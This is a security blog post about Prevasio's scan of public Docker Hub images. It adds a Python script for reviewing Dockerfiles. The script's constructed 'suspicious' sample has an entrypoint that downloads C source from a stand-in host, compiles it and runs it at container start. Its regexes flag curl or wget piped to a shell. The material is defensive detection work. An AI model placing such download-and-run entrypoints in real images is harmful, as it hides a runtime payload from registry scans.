Critical Vulnerabilities Found in Public Docker Hub Images

Misconfiguration of Docker containers continues to harbor critical vulnerabilities. A recent study shows public Docker Hub images are contributing to the problem.

Earlier this month, we wrote about a Docker container vulnerability due to misconfiguration. Blackrota entered the scene, designed to exploit the exact vulnerabilities that the misconfigured containers had. Around the same time, Prevasio released the results of “Operation ‘Red Kangaroo’: Industry’s First Dynamic Analysis of 4M Public Docker Hub Images,” and the findings were dismal. Over half of the images that were analyzed had critical vulnerabilities.

From Prevasio’s report:

“In order to handle such a massive volume of images, Prevasio Analyzer was executed non-stop for a period of one month on 800 machines running in parallel.

The result of our dynamic scan reveals that:

  • 51 percent of all containers had “critical” vulnerabilities, while 13 percent were classified as “high” and four percent as “moderate” vulnerabilities.
  • Six thousand containers were riddled with cryptominers, hacking tools/pen testing frameworks, and backdoor trojans. While many cryptominers and hacking tools may not be malicious per se, they present a potentially unwanted issue to an enterprise.
  • More than 400 container images (with nearly 600,000 pulls) of weaponized Windows malware crossing over into the world of Linux. This crossover is directly due to the proliferation of cross-platform code (e.g. GoLang, .NET Core and PowerShell Core).

Our analysis of malicious containers also shows that quite a few images contain a dynamic payload. That is, an image in its original form does not have a malicious binary. However, at runtime, it might be scripted to download a source of a coinminer, to then compile and execute it.”

This is a really big problem. It’s clear that threat actors already know this issue exists, and have known for some time. The Docker Hub accounts for over 4 million images, which are expected to top 100 million downloads in 2020. How many companies have used these images? How many businesses are losing money they didn’t know they were losing? What will the extent of the damage from this look like when all is said and done? Unfortunately, it’s going to be a very long time before we have those answers. The impact will be far-reaching and likely costly.

This discovery illustrates another reason we say that configuration matters, and why code should be reviewed when it’s publicly available. It’s why we say that testing matters, and why we say that bringing in an expert is always a good idea: someone who can verify that your configuration looks good, that your code is clean, stable and secure, and who can test products before they are launched. An outside pair of eyes is always going to catch something your own team doesn’t see, precisely because your team has spent so much time looking at it. Finding those misses is imperative to the security of your business.
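The “dynamic payload” pattern in Prevasio’s report (an image whose layers are clean, but whose entrypoint downloads, compiles and runs code at start) is exactly the kind of thing a configuration review of a public image should catch before it is pulled into production. The script below is an added example, written for this post; it is not Prevasio’s analyzer and not code from the original article. It does a static review of a Dockerfile (the same instructions are visible for a pulled image via `docker history`), flags fetch-and-execute shell patterns in RUN/CMD/ENTRYPOINT, remote ADD sources, and a missing non-root USER. The two sample Dockerfiles, the `example.invalid` URLs and the regexes are constructed for the example and are not an exhaustive rule set.

```python
"""Static review of a Dockerfile for fetch-and-execute ("dynamic payload") patterns.

Added example for this article; the heuristics below are assumptions about
common shapes of the pattern, not a complete malware detector.
"""
import re
from typing import List, Tuple

# Constructed sample: image layers carry no malicious binary, but the entrypoint
# downloads source at container start, compiles it and runs the result.
SUSPICIOUS_DOCKERFILE = """\
FROM alpine:3.12
# looks like an ordinary build-tools image
RUN apk add --no-cache curl build-base
ADD https://example.invalid/tools.tar.gz /opt/tools.tar.gz
ENTRYPOINT curl -s http://example.invalid/m.c -o /tmp/m.c && \\
    gcc /tmp/m.c -o /tmp/m && /tmp/m
"""

# Constructed sample of the shape a reviewer wants to see: everything the
# container runs is baked into the image, and it drops root.
CLEAN_DOCKERFILE = """\
FROM alpine:3.12
RUN apk add --no-cache python3
COPY app.py /app/app.py
USER nobody
ENTRYPOINT ["python3", "/app/app.py"]
"""

DOWNLOADER = re.compile(r"\b(curl|wget)\b", re.IGNORECASE)
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.IGNORECASE)
COMPILE_OR_EXEC = re.compile(
    r"\b(gcc|cc|make|chmod\s+\+x|python3?|perl)\b|\./\S+", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def parse_dockerfile(text: str) -> List[Tuple[str, str]]:
    """Return (INSTRUCTION, arguments) pairs.

    Joins backslash-continued lines (so a multi-line ENTRYPOINT is reviewed as
    one command) and skips blank lines and comments.
    """
    instructions: List[Tuple[str, str]] = []
    buf = ""

    def flush(chunk: str) -> None:
        parts = chunk.strip().split(None, 1)
        if parts:
            instructions.append((parts[0].upper(), parts[1] if len(parts) > 1 else ""))

    for raw in text.splitlines():
        line = raw.rstrip()
        if not buf and (not line.strip() or line.lstrip().startswith("#")):
            continue
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        flush(buf + line)
        buf = ""
    if buf:
        flush(buf)
    return instructions


def review_dockerfile(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings: List[str] = []
    instructions = parse_dockerfile(text)

    # Build- and run-time commands all default to root unless USER is set.
    drops_root = any(name == "USER" and args.strip() not in ("", "root", "0")
                     for name, args in instructions)
    if not drops_root:
        findings.append("no non-root USER: container processes run as root")

    for name, args in instructions:
        if name == "ADD" and REMOTE_URL.search(args):
            findings.append(f"ADD pulls remote content into the image at build time: {args}")
        if name in ("RUN", "CMD", "ENTRYPOINT") and DOWNLOADER.search(args):
            stage = "at container start" if name != "RUN" else "at build time"
            if PIPE_TO_SHELL.search(args):
                findings.append(f"{name} pipes a download straight into a shell {stage}: {args}")
            elif COMPILE_OR_EXEC.search(args):
                findings.append(f"{name} downloads, then compiles or executes the result {stage}: {args}")
            elif name != "RUN":
                # Image is clean on disk; payload only appears when it runs.
                findings.append(f"{name} downloads content {stage} (dynamic payload): {args}")
    return findings


if __name__ == "__main__":
    for label, dockerfile in (("suspicious", SUSPICIOUS_DOCKERFILE), ("clean", CLEAN_DOCKERFILE)):
        print(f"== {label} ==")
        for finding in review_dockerfile(dockerfile) or ["no findings"]:
            print("  -", finding)
```

Run it as-is to see the suspicious sample produce three findings (root user, remote ADD, and the download-compile-run entrypoint) while the clean sample produces none. Installing `curl` in a RUN step is deliberately not flagged on its own; what the review cares about is remote content being executed, especially at container start, where a registry scan of the image’s layers sees nothing.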

Security isn’t just about firewalls, protocols, hackers, incident responses and magical voodoo. It’s configuration, solid code, proper testing, diligence, vigilance, and properly training non-technical employees. It’s not magic, it’s not even necessarily hard, and it is absolutely vital to the success of your business. If there’s one thing you don’t skimp on in 2021, make it security!

About the Author

Pieter VanIperen, Managing Partner of PWV Consultants, leads a boutique group of industry leaders and influencers from the digital tech, security and design industries that acts as trusted technical partners for many Fortune 500 companies, high-visibility startups, universities, defense agencies, and NGOs. He is a 20-year software engineering veteran who founded or co-founded several companies. He acts as a trusted advisor and mentor to numerous early-stage startups, and has held the titles of software and software security executive, consultant and professor. His expert consulting and advisory work spans several industries, including finance, media, medical tech, and defense contracting. He also authored the highly influential precursor HAZL (jADE) programming language.
